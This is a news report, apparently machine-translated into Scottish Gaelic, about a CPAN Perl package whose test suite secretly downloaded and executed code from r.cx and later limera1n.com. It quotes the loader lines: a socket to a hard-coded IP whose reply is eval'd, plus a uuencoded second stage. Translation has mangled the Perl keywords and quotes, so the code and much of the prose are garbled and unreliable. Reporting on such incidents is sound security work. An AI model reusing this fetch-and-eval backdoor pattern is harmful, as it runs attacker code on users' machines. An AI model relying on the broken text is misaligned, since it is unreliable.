Ann am pasgan Perl air a sgaoileadh tro eòlaire CPAN , air a dhealbhadh gus modalan CPAN a luchdachadh gu fèin-ghluasadach air an itealan, còd droch-rùnach. Bha an cuir a-steach droch-rùnach anns a’ chòd deuchainn , a tha air a bhith air a lìbhrigeadh bho 2011.
Bu chòir a thoirt fa-near gun do dh’ èirich ceistean mu bhith a’ luchdachadh còd teagmhach air ais ann an 2016.
Bidh gnìomhachd droch-rùnach a’ goil sìos gu oidhirp còd a luchdachadh sìos agus a chuir an gnìomh bho fhrithealaiche treas-phàrtaidh (http://r.cx:1/) nuair a thathar a’ cur gu bàs sreath deuchainn a chaidh a chuir air bhog nuair a thathar a’ stàladh a’ mhodail. Thathas a’ gabhail ris nach robh an còd a chaidh a luchdachadh sìos an toiseach bhon t-seirbheisiche taobh a-muigh droch-rùnach, ach a-nis tha an t-iarrtas air ath-stiùireadh chun àrainn ww.limera1n.com, a bheir seachad a chuibhreann den chòd airson a chuir gu bàs.
Gus an luchdachadh sìos a chuir air dòigh ann am faidhle Tha an còd a leanas air a chleachdadh:
mo $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
mo $try = `$^X $prog`;
Tha an còd ainmichte ag adhbhrachadh gun tèid an sgriobt a chuir gu bàs , agus tha na tha ann air a lughdachadh chun loidhne:
cleachd lib do{eval<$b> &&botstrap("RCX")if$b=IO ùr::Socket::INET 82.46.99.88.": 1 ″};
Tha an sgriobt seo a’ luchdachadh cleachdadh na seirbheis còd bhon òstair taobh a-muigh r.cx (còdan caractar 82.46.99.88 a 'freagairt ris an teacsa "R.cX") agus ga chur an gnìomh anns a' bhloc eval.
$ perl -MIO::Socket -e'$b = IO ùr:: Socaid:: INET 82.46.99.88.": 1 ″; clò-bhuail <$b>;'
eval unpack u=> q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
Às deidh dì-phapadh, thèid na leanas a chuir gu bàs mu dheireadh: :
clò-bhualadh{$b=IO ùr::Socket::INET"ww.limera1n.com:80″}"FAIGH /iJailBreak
"; tilleadh luachair rabhadh $@fhad $b;1
Tha am pasgan trioblaideach a-nis air a thoirt air falbh bhon stòr. (Perl Authors Upload Server), agus tha cunntas ùghdar a’ mhodail air a bhacadh. Anns a 'chùis seo, tha am modal fhathast ann ann an tasglann MetaCPAN agus faodar a chuir a-steach gu dìreach bho MetaCPAN a’ cleachdadh cuid de ghoireasan leithid cpanminus. nach deach am pasgan a sgaoileadh gu farsaing.
Inntinneach a dheasbad agus ùghdar a’ mhodal, a chaidh às àicheadh an fhiosrachaidh gun deach còd droch-rùnach a chuir a-steach às deidh don làrach aige “r.cx” a bhith air a slaodadh agus mhìnich e gu robh e dìreach a ’faighinn spòrs, agus a’ cleachdadh perlobfuscator.com gun a bhith a ’falach rudeigin, ach gus am meud a lughdachadh den chòd agus a dhèanamh nas sìmplidhe air a chopaigeadh tron bhòrd bhidio. Tha roghainn an ainm gnìomh “botstrap” air a mhìneachadh leis gu bheil am facal seo “coltach ri bot agus gu bheil e nas giorra na bootstrap.” Thug ùghdar a’ mhodal cinnteach cuideachd nach bi na h-làimhseachaidhean a chaidh a chomharrachadh a’ coileanadh gnìomhan droch-rùnach, ach nach eil iad a’ sealltainn ach luchdachadh agus cur an gnìomh còd tro TCP.
Source: fosgailtenet.ru